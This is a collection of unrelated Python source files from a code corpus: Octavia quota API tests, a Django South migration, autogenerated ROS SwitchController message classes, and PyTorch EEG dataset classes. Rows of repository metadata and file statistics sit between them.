    self._assert_quotas_equal(fetched['quota'], expected=expected)
def test_custom_missing_quotas(self):
    """A key omitted from a PUT falls back to the configured default."""
    quota_path = self.QUOTA_PATH.format(project_id=self.project_id)
    # 'listener' is deliberately absent from the request body.
    submitted = {'load_balancer': 30, 'pool': 30,
                 'health_monitor': 30, 'member': 30}
    expected = dict(submitted,
                    listener=CONF.quotas.default_listener_quota)
    self.put(quota_path, {'quota': submitted}, status=202)
    fetched = self.get(quota_path).json
    self._assert_quotas_equal(fetched['quota'], expected=expected)
def test_delete_custom_quotas(self):
    """DELETE resets a project's custom quotas back to the defaults."""
    quota_path = self.QUOTA_PATH.format(project_id=self.project_id)
    custom = {'load_balancer': 30, 'listener': 30, 'pool': 30,
              'health_monitor': 30, 'member': 30}
    self.put(quota_path, {'quota': custom}, status=202)
    # Confirm the custom values took effect before deleting.
    self._assert_quotas_equal(self.get(quota_path).json['quota'],
                              expected=custom)
    self.delete(quota_path, status=202)
    # After the delete, the defaults are reported again.
    self._assert_quotas_equal(self.get(quota_path).json['quota'])
def test_delete_custom_quotas_admin(self):
    """The quota-admin role may DELETE a project's custom quotas."""
    quota_path = self.QUOTA_PATH.format(project_id=self.project_id)
    custom = {'load_balancer': 30, 'listener': 30, 'pool': 30,
              'health_monitor': 30, 'member': 30}
    self.put(quota_path, {'quota': custom}, status=202)
    self._assert_quotas_equal(self.get(quota_path).json['quota'],
                              expected=custom)
    self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
    saved_strategy = self.conf.conf.api_settings.get('auth_strategy')
    self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
    admin_creds = {
        'user_id': None,
        'project_id': self.project_id,
        'user_domain_id': None,
        'project_domain_id': None,
        'roles': ['load-balancer_quota_admin'],
        'service_roles': [],
        'is_admin': False,
        'is_admin_project': True,
        'service_user_id': None,
        'service_user_domain_id': None,
        'service_project_id': None,
        'service_project_domain_id': None}
    with mock.patch.object(octavia.common.context.Context, 'project_id',
                           self.project_id):
        with mock.patch(
                "oslo_context.context.RequestContext.to_policy_values",
                return_value=admin_creds):
            self.delete(quota_path, status=202)
    self.conf.config(group='api_settings', auth_strategy=saved_strategy)
    # The project is back on default quotas after the delete.
    self._assert_quotas_equal(self.get(quota_path).json['quota'])
def test_delete_quotas_not_Authorized_member(self):
    """A plain member may not DELETE quotas; the values stay in place."""
    quota_path = self.QUOTA_PATH.format(project_id=self.project_id)
    custom = {'load_balancer': 30, 'listener': 30, 'pool': 30,
              'health_monitor': 30, 'member': 30}
    self.put(quota_path, {'quota': custom}, status=202)
    self._assert_quotas_equal(self.get(quota_path).json['quota'],
                              expected=custom)
    self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
    saved_strategy = self.conf.conf.api_settings.get('auth_strategy')
    self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
    member_creds = {
        'user_id': None,
        'project_id': self.project_id,
        'user_domain_id': None,
        'project_domain_id': None,
        'roles': ['load-balancer_member'],
        'service_roles': [],
        'is_admin': False,
        'is_admin_project': True,
        'service_user_id': None,
        'service_user_domain_id': None,
        'service_project_id': None,
        'service_project_domain_id': None}
    with mock.patch.object(octavia.common.context.Context, 'project_id',
                           self.project_id):
        with mock.patch(
                "oslo_context.context.RequestContext.to_policy_values",
                return_value=member_creds):
            self.delete(quota_path, status=403)
    self.conf.config(group='api_settings', auth_strategy=saved_strategy)
    # The rejected delete must not have altered the custom quotas.
    self._assert_quotas_equal(self.get(quota_path).json['quota'],
                              expected=custom)
def test_delete_non_existent_custom_quotas(self):
    """DELETE for an unknown project id returns 404."""
    self.delete(self.QUOTA_PATH.format(project_id='bogus'), status=404)
| 47.339751
| 79
| 0.604675
| 4,762
| 41,801
| 5.00273
| 0.050819
| 0.049868
| 0.028208
| 0.021744
| 0.905847
| 0.884901
| 0.875624
| 0.859841
| 0.848802
| 0.844142
| 0
| 0.019113
| 0.285304
| 41,801
| 882
| 80
| 47.393424
| 0.77831
| 0.02122
| 0
| 0.83584
| 0
| 0
| 0.15404
| 0.038834
| 0
| 0
| 0
| 0.001134
| 0.075188
| 1
| 0.045113
| false
| 0
| 0.010025
| 0
| 0.06015
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c89389f87ae0c9ff5d1c1d7659494937cb20dbc
| 10,939
|
py
|
Python
|
dbaas/physical/migrations/0017_auto__chg_field_environment_equivalent_environment__chg_field_instance.py
|
didindinn/database-as-a-service
|
747de31ff8546f7874ddd654af860e130afd17a0
|
[
"BSD-3-Clause"
] | 303
|
2015-01-08T10:35:54.000Z
|
2022-02-28T08:54:06.000Z
|
dbaas/physical/migrations/0017_auto__chg_field_environment_equivalent_environment__chg_field_instance.py
|
nouraellm/database-as-a-service
|
5e655c9347bea991b7218a01549f5e44f161d7be
|
[
"BSD-3-Clause"
] | 124
|
2015-01-14T12:56:15.000Z
|
2022-03-22T20:45:11.000Z
|
dbaas/physical/migrations/0017_auto__chg_field_environment_equivalent_environment__chg_field_instance.py
|
nouraellm/database-as-a-service
|
5e655c9347bea991b7218a01549f5e44f161d7be
|
[
"BSD-3-Clause"
] | 110
|
2015-01-02T11:59:48.000Z
|
2022-02-28T08:54:06.000Z
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
    """Add on_delete=SET_NULL to the four self/cross-referential FK columns."""
    fk_path = 'django.db.models.fields.related.ForeignKey'
    # (table, column, target model) triples all receiving the same change.
    alterations = (
        (u'physical_environment', 'equivalent_environment_id',
         'physical.Environment'),
        (u'physical_instance', 'future_instance_id', 'physical.Instance'),
        (u'physical_host', 'future_host_id', 'physical.Host'),
        (u'physical_plan', 'equivalent_plan_id', 'physical.Plan'),
    )
    for table, column, target in alterations:
        db.alter_column(table, column, self.gf(fk_path)(
            to=orm[target], null=True, on_delete=models.SET_NULL))
def backwards(self, orm):
# Changing field 'Environment.equivalent_environment'
db.alter_column(u'physical_environment', 'equivalent_environment_id', self.gf(
'django.db.models.fields.related.ForeignKey')(to=orm['physical.Environment'], null=True))
# Changing field 'Instance.future_instance'
db.alter_column(u'physical_instance', 'future_instance_id', self.gf(
'django.db.models.fields.related.ForeignKey')(to=orm['physical.Instance'], null=True))
# Changing field 'Host.future_host'
db.alter_column(u'physical_host', 'future_host_id', self.gf(
'django.db.models.fields.related.ForeignKey')(to=orm['physical.Host'], null=True))
# Changing field 'Plan.equivalent_plan'
db.alter_column(u'physical_plan', 'equivalent_plan_id', self.gf(
'django.db.models.fields.related.ForeignKey')(to=orm['physical.Plan'], null=True))
models = {
u'physical.databaseinfra': {
'Meta': {'object_name': 'DatabaseInfra'},
'capacity': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'endpoint': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'endpoint_dns': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'engine': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'databaseinfras'", 'on_delete': 'models.PROTECT', 'to': u"orm['physical.Engine']"}),
'environment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'databaseinfras'", 'on_delete': 'models.PROTECT', 'to': u"orm['physical.Environment']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '406', 'blank': 'True'}),
'per_database_size_mbytes': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'plan': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'databaseinfras'", 'on_delete': 'models.PROTECT', 'to': u"orm['physical.Plan']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'})
},
u'physical.engine': {
'Meta': {'unique_together': "((u'version', u'engine_type'),)", 'object_name': 'Engine'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'engine_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'engines'", 'on_delete': 'models.PROTECT', 'to': u"orm['physical.EngineType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'template_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user_data_script': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'physical.enginetype': {
'Meta': {'object_name': 'EngineType'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'physical.environment': {
'Meta': {'object_name': 'Environment'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'equivalent_environment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['physical.Environment']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'physical.host': {
'Meta': {'object_name': 'Host'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'future_host': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['physical.Host']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'hostname': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'monitor_url': ('django.db.models.fields.URLField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'physical.instance': {
'Meta': {'unique_together': "((u'address', u'port'),)", 'object_name': 'Instance'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'databaseinfra': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'instances'", 'to': u"orm['physical.DatabaseInfra']"}),
'dns': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'future_instance': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['physical.Instance']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'hostname': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['physical.Host']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'instance_type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_arbiter': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'port': ('django.db.models.fields.IntegerField', [], {}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'physical.plan': {
'Meta': {'object_name': 'Plan'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'engine_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'plans'", 'to': u"orm['physical.EngineType']"}),
'environments': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['physical.Environment']", 'symmetrical': 'False'}),
'equivalent_plan': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['physical.Plan']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_ha': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'max_db_size': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'provider': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'physical.planattribute': {
'Meta': {'object_name': 'PlanAttribute'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'plan': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'plan_attributes'", 'to': u"orm['physical.Plan']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
}
}
complete_apps = ['physical']
| 76.496503
| 194
| 0.593107
| 1,205
| 10,939
| 5.243983
| 0.100415
| 0.09875
| 0.170597
| 0.243709
| 0.844121
| 0.822124
| 0.815952
| 0.759614
| 0.71198
| 0.678272
| 0
| 0.00689
| 0.177347
| 10,939
| 142
| 195
| 77.035211
| 0.695299
| 0.03227
| 0
| 0.302521
| 0
| 0
| 0.572144
| 0.301626
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016807
| false
| 0.008403
| 0.033613
| 0
| 0.07563
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c972a6643a15644f2fc9c32e428bf404091a55c
| 12,906
|
py
|
Python
|
melodic/lib/python2.7/dist-packages/controller_manager_msgs/srv/_SwitchController.py
|
Dieptranivsr/Ros_Diep
|
d790e75e6f5da916701b11a2fdf3e03b6a47086b
|
[
"MIT"
] | null | null | null |
melodic/lib/python2.7/dist-packages/controller_manager_msgs/srv/_SwitchController.py
|
Dieptranivsr/Ros_Diep
|
d790e75e6f5da916701b11a2fdf3e03b6a47086b
|
[
"MIT"
] | 1
|
2021-07-08T10:26:06.000Z
|
2021-07-08T10:31:11.000Z
|
melodic/lib/python2.7/dist-packages/controller_manager_msgs/srv/_SwitchController.py
|
Dieptranivsr/Ros_Diep
|
d790e75e6f5da916701b11a2fdf3e03b6a47086b
|
[
"MIT"
] | null | null | null |
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from controller_manager_msgs/SwitchControllerRequest.msg. Do not edit."""
import codecs
import sys
# True when running under Python 3 (hexversion >= 0x03010000 range); the
# comparison already yields a bool, so the ternary `True if ... else False`
# was redundant.
python3 = sys.hexversion > 0x03000000
import genpy
import struct
class SwitchControllerRequest(genpy.Message):
    """Autogenerated genpy message for controller_manager_msgs/SwitchControllerRequest.

    Wire layout: two uint32-length-prefixed string arrays
    (start_controllers, stop_controllers) followed by a fixed-size tail of
    int32 strictness, uint8 start_asap, float64 timeout (little-endian).
    """
    _md5sum = "36d99a977432b71d4bf16ce5847949d7"
    _type = "controller_manager_msgs/SwitchControllerRequest"
    _has_header = False  # flag to mark the presence of a Header object
    _full_text = """# The SwitchController service allows you stop a number of controllers
# and start a number of controllers, all in one single timestep of the
# controller_manager control loop.
# To switch controllers, specify
# * the list of controller names to start,
# * the list of controller names to stop, and
# * the strictness (BEST_EFFORT or STRICT)
# * STRICT means that switching will fail if anything goes wrong (an invalid
# controller name, a controller that failed to start, etc. )
# * BEST_EFFORT means that even when something goes wrong with on controller,
# the service will still try to start/stop the remaining controllers
# * start the controllers as soon as their hardware dependencies are ready, will
# wait for all interfaces to be ready otherwise
# * the timeout in seconds before aborting pending controllers. Zero for infinite
# The return value "ok" indicates if the controllers were switched
# successfully or not. The meaning of success depends on the
# specified strictness.
string[] start_controllers
string[] stop_controllers
int32 strictness
int32 BEST_EFFORT=1
int32 STRICT=2
bool start_asap
float64 timeout
"""
    # Pseudo-constants
    BEST_EFFORT = 1
    STRICT = 2
    __slots__ = ['start_controllers','stop_controllers','strictness','start_asap','timeout']
    _slot_types = ['string[]','string[]','int32','bool','float64']

    def __init__(self, *args, **kwds):
        """
        Constructor. Any message fields that are implicitly/explicitly
        set to None will be assigned a default value. The recommend
        use is keyword arguments as this is more robust to future message
        changes. You cannot mix in-order arguments and keyword arguments.
        The available fields are:
        start_controllers,stop_controllers,strictness,start_asap,timeout
        :param args: complete set of field values, in .msg order
        :param kwds: use keyword arguments corresponding to message field names
        to set specific fields.
        """
        if args or kwds:
            super(SwitchControllerRequest, self).__init__(*args, **kwds)
            # message fields cannot be None, assign default values for those that are
            if self.start_controllers is None:
                self.start_controllers = []
            if self.stop_controllers is None:
                self.stop_controllers = []
            if self.strictness is None:
                self.strictness = 0
            if self.start_asap is None:
                self.start_asap = False
            if self.timeout is None:
                self.timeout = 0.
        else:
            # No arguments given: default-initialize every field.
            self.start_controllers = []
            self.stop_controllers = []
            self.strictness = 0
            self.start_asap = False
            self.timeout = 0.

    def _get_types(self):
        """
        internal API method
        """
        return self._slot_types

    def serialize(self, buff):
        """
        serialize message into buffer
        :param buff: buffer, ``StringIO``
        """
        try:
            # Each string array: uint32 element count, then each element as a
            # uint32-length-prefixed UTF-8 byte string.
            length = len(self.start_controllers)
            buff.write(_struct_I.pack(length))
            for val1 in self.start_controllers:
                length = len(val1)
                if python3 or type(val1) == unicode:
                    val1 = val1.encode('utf-8')
                    length = len(val1)
                buff.write(struct.Struct('<I%ss'%length).pack(length, val1))
            length = len(self.stop_controllers)
            buff.write(_struct_I.pack(length))
            for val1 in self.stop_controllers:
                length = len(val1)
                if python3 or type(val1) == unicode:
                    val1 = val1.encode('utf-8')
                    length = len(val1)
                buff.write(struct.Struct('<I%ss'%length).pack(length, val1))
            _x = self
            # Fixed-size tail: int32 strictness, uint8 start_asap, float64 timeout.
            buff.write(_get_struct_iBd().pack(_x.strictness, _x.start_asap, _x.timeout))
        except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
        except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))

    def deserialize(self, str):
        """
        unpack serialized message in str into this message instance
        :param str: byte array of serialized message, ``str``
        """
        # Tag the "rosmsg" codec error handler with this type so decode
        # failures report which message was being parsed.
        codecs.lookup_error("rosmsg").msg_type = self._type
        try:
            end = 0
            start = end
            end += 4
            (length,) = _struct_I.unpack(str[start:end])
            self.start_controllers = []
            for i in range(0, length):
                start = end
                end += 4
                (length,) = _struct_I.unpack(str[start:end])
                start = end
                end += length
                if python3:
                    val1 = str[start:end].decode('utf-8', 'rosmsg')
                else:
                    val1 = str[start:end]
                self.start_controllers.append(val1)
            start = end
            end += 4
            (length,) = _struct_I.unpack(str[start:end])
            self.stop_controllers = []
            for i in range(0, length):
                start = end
                end += 4
                (length,) = _struct_I.unpack(str[start:end])
                start = end
                end += length
                if python3:
                    val1 = str[start:end].decode('utf-8', 'rosmsg')
                else:
                    val1 = str[start:end]
                self.stop_controllers.append(val1)
            _x = self
            start = end
            end += 13  # int32 (4) + uint8 (1) + float64 (8)
            (_x.strictness, _x.start_asap, _x.timeout,) = _get_struct_iBd().unpack(str[start:end])
            # Normalize the wire uint8 into a real bool.
            self.start_asap = bool(self.start_asap)
            return self
        except struct.error as e:
            raise genpy.DeserializationError(e)  # most likely buffer underfill

    def serialize_numpy(self, buff, numpy):
        """
        serialize message with numpy array types into buffer
        :param buff: buffer, ``StringIO``
        :param numpy: numpy python module
        """
        try:
            length = len(self.start_controllers)
            buff.write(_struct_I.pack(length))
            for val1 in self.start_controllers:
                length = len(val1)
                if python3 or type(val1) == unicode:
                    val1 = val1.encode('utf-8')
                    length = len(val1)
                buff.write(struct.Struct('<I%ss'%length).pack(length, val1))
            length = len(self.stop_controllers)
            buff.write(_struct_I.pack(length))
            for val1 in self.stop_controllers:
                length = len(val1)
                if python3 or type(val1) == unicode:
                    val1 = val1.encode('utf-8')
                    length = len(val1)
                buff.write(struct.Struct('<I%ss'%length).pack(length, val1))
            _x = self
            buff.write(_get_struct_iBd().pack(_x.strictness, _x.start_asap, _x.timeout))
        except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
        except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))

    def deserialize_numpy(self, str, numpy):
        """
        unpack serialized message in str into this message instance using numpy for array types
        :param str: byte array of serialized message, ``str``
        :param numpy: numpy python module
        """
        codecs.lookup_error("rosmsg").msg_type = self._type
        try:
            end = 0
            start = end
            end += 4
            (length,) = _struct_I.unpack(str[start:end])
            self.start_controllers = []
            for i in range(0, length):
                start = end
                end += 4
                (length,) = _struct_I.unpack(str[start:end])
                start = end
                end += length
                if python3:
                    val1 = str[start:end].decode('utf-8', 'rosmsg')
                else:
                    val1 = str[start:end]
                self.start_controllers.append(val1)
            start = end
            end += 4
            (length,) = _struct_I.unpack(str[start:end])
            self.stop_controllers = []
            for i in range(0, length):
                start = end
                end += 4
                (length,) = _struct_I.unpack(str[start:end])
                start = end
                end += length
                if python3:
                    val1 = str[start:end].decode('utf-8', 'rosmsg')
                else:
                    val1 = str[start:end]
                self.stop_controllers.append(val1)
            _x = self
            start = end
            end += 13
            (_x.strictness, _x.start_asap, _x.timeout,) = _get_struct_iBd().unpack(str[start:end])
            self.start_asap = bool(self.start_asap)
            return self
        except struct.error as e:
            raise genpy.DeserializationError(e)  # most likely buffer underfill
# Shared Struct for a single little-endian uint32 (the ROS array-length
# prefix), provided by genpy.
_struct_I = genpy.struct_I
def _get_struct_I():
    """Return the shared uint32 Struct used for length prefixes."""
    global _struct_I
    return _struct_I
_struct_iBd = None
def _get_struct_iBd():
global _struct_iBd
if _struct_iBd is None:
_struct_iBd = struct.Struct("<iBd")
return _struct_iBd
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from controller_manager_msgs/SwitchControllerResponse.msg. Do not edit."""
import codecs
import sys
# True when running under Python 3; the comparison already yields a bool,
# so the ternary `True if ... else False` was redundant.
python3 = sys.hexversion > 0x03000000
import genpy
import struct
class SwitchControllerResponse(genpy.Message):
    """Autogenerated genpy message for controller_manager_msgs/SwitchControllerResponse.

    Wire layout: a single uint8 encoding the bool `ok` field.
    """
    _md5sum = "6f6da3883749771fac40d6deb24a8c02"
    _type = "controller_manager_msgs/SwitchControllerResponse"
    _has_header = False  # flag to mark the presence of a Header object
    _full_text = """bool ok
"""
    __slots__ = ['ok']
    _slot_types = ['bool']

    def __init__(self, *args, **kwds):
        """
        Constructor. Any message fields that are implicitly/explicitly
        set to None will be assigned a default value. The recommend
        use is keyword arguments as this is more robust to future message
        changes. You cannot mix in-order arguments and keyword arguments.
        The available fields are:
        ok
        :param args: complete set of field values, in .msg order
        :param kwds: use keyword arguments corresponding to message field names
        to set specific fields.
        """
        if args or kwds:
            super(SwitchControllerResponse, self).__init__(*args, **kwds)
            # message fields cannot be None, assign default values for those that are
            if self.ok is None:
                self.ok = False
        else:
            # No arguments given: default-initialize the field.
            self.ok = False

    def _get_types(self):
        """
        internal API method
        """
        return self._slot_types

    def serialize(self, buff):
        """
        serialize message into buffer
        :param buff: buffer, ``StringIO``
        """
        try:
            _x = self.ok
            # Single uint8 carrying the bool.
            buff.write(_get_struct_B().pack(_x))
        except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
        except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))

    def deserialize(self, str):
        """
        unpack serialized message in str into this message instance
        :param str: byte array of serialized message, ``str``
        """
        # Tag the "rosmsg" codec error handler with this type for diagnostics.
        codecs.lookup_error("rosmsg").msg_type = self._type
        try:
            end = 0
            start = end
            end += 1
            (self.ok,) = _get_struct_B().unpack(str[start:end])
            # Normalize the wire uint8 into a real bool.
            self.ok = bool(self.ok)
            return self
        except struct.error as e:
            raise genpy.DeserializationError(e)  # most likely buffer underfill

    def serialize_numpy(self, buff, numpy):
        """
        serialize message with numpy array types into buffer
        :param buff: buffer, ``StringIO``
        :param numpy: numpy python module
        """
        try:
            _x = self.ok
            buff.write(_get_struct_B().pack(_x))
        except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
        except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))

    def deserialize_numpy(self, str, numpy):
        """
        unpack serialized message in str into this message instance using numpy for array types
        :param str: byte array of serialized message, ``str``
        :param numpy: numpy python module
        """
        codecs.lookup_error("rosmsg").msg_type = self._type
        try:
            end = 0
            start = end
            end += 1
            (self.ok,) = _get_struct_B().unpack(str[start:end])
            self.ok = bool(self.ok)
            return self
        except struct.error as e:
            raise genpy.DeserializationError(e)  # most likely buffer underfill
# Shared Struct for a single little-endian uint32, provided by genpy.
_struct_I = genpy.struct_I
def _get_struct_I():
    """Return the shared uint32 Struct used for length prefixes."""
    global _struct_I
    return _struct_I
_struct_B = None
def _get_struct_B():
global _struct_B
if _struct_B is None:
_struct_B = struct.Struct("<B")
return _struct_B
class SwitchController(object):
    """Service definition pairing the request and response message classes
    for the controller_manager_msgs/SwitchController ROS service."""
    _type = 'controller_manager_msgs/SwitchController'
    _md5sum = 'b29a7abc673b2c54c14b54e50f8d06a5'
    _request_class = SwitchControllerRequest
    _response_class = SwitchControllerResponse
| 34.881081
| 145
| 0.653572
| 1,717
| 12,906
| 4.758299
| 0.136284
| 0.035251
| 0.026928
| 0.024969
| 0.762301
| 0.762301
| 0.755936
| 0.755936
| 0.741983
| 0.741983
| 0
| 0.018734
| 0.234852
| 12,906
| 369
| 146
| 34.97561
| 0.808608
| 0.193941
| 0
| 0.768657
| 1
| 0
| 0.183292
| 0.023112
| 0
| 0
| 0.002001
| 0
| 0
| 1
| 0.059701
| false
| 0
| 0.029851
| 0
| 0.205224
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7cb2d693eebfe6d57076eb01d8908d6c01307d06
| 989
|
py
|
Python
|
Fine-tune/datasets.py
|
neerajwagh/eeg-self-supervision
|
fb0a1bf357b0e553aab9c4ccfc2973156dc8a9e7
|
[
"MIT"
] | 7
|
2021-11-14T19:58:43.000Z
|
2022-03-19T08:35:14.000Z
|
evaluation/datasets.py
|
neerajwagh/eeg-self-supervision
|
fb0a1bf357b0e553aab9c4ccfc2973156dc8a9e7
|
[
"MIT"
] | null | null | null |
evaluation/datasets.py
|
neerajwagh/eeg-self-supervision
|
fb0a1bf357b0e553aab9c4ccfc2973156dc8a9e7
|
[
"MIT"
] | null | null | null |
import numpy as np
import torch
class Dataset(torch.utils.data.Dataset):
    """Map-style dataset yielding topographic feature windows.

    Each sample is a dict with the window index, the feature tensor for
    that window, and its label.
    """

    def __init__(self, window_idx, X, y):
        self.window_idx = window_idx  # indices into X/y selecting the windows served
        self.topo_data = X            # full feature array, indexed by window
        self.labels = y               # per-window labels

    def __len__(self):
        return len(self.window_idx)

    def __getitem__(self, sample_idx):
        # Map the dataset position to the underlying window index.
        idx = self.window_idx[sample_idx]
        sample = {"window_idx": idx}
        sample["feature_data"] = torch.from_numpy(self.topo_data[idx, ...])
        sample["label"] = self.labels[idx]
        return sample
class TimeseriesDataset(torch.utils.data.Dataset):
    """Map-style dataset yielding raw time-series windows.

    Identical contract to ``Dataset`` but reads from a time-series array
    stored in ``timeseries_data``.
    """

    def __init__(self, window_idx, X, y):
        self.window_idx = window_idx      # indices into X/y selecting the windows served
        self.timeseries_data = X          # full time-series array, indexed by window
        self.labels = y                   # per-window labels

    def __len__(self):
        return len(self.window_idx)

    def __getitem__(self, sample_idx):
        # Map the dataset position to the underlying window index.
        idx = self.window_idx[sample_idx]
        sample = {"window_idx": idx}
        sample["feature_data"] = torch.from_numpy(self.timeseries_data[idx, ...])
        sample["label"] = self.labels[idx]
        return sample
| 26.026316
| 75
| 0.673407
| 136
| 989
| 4.485294
| 0.198529
| 0.295082
| 0.170492
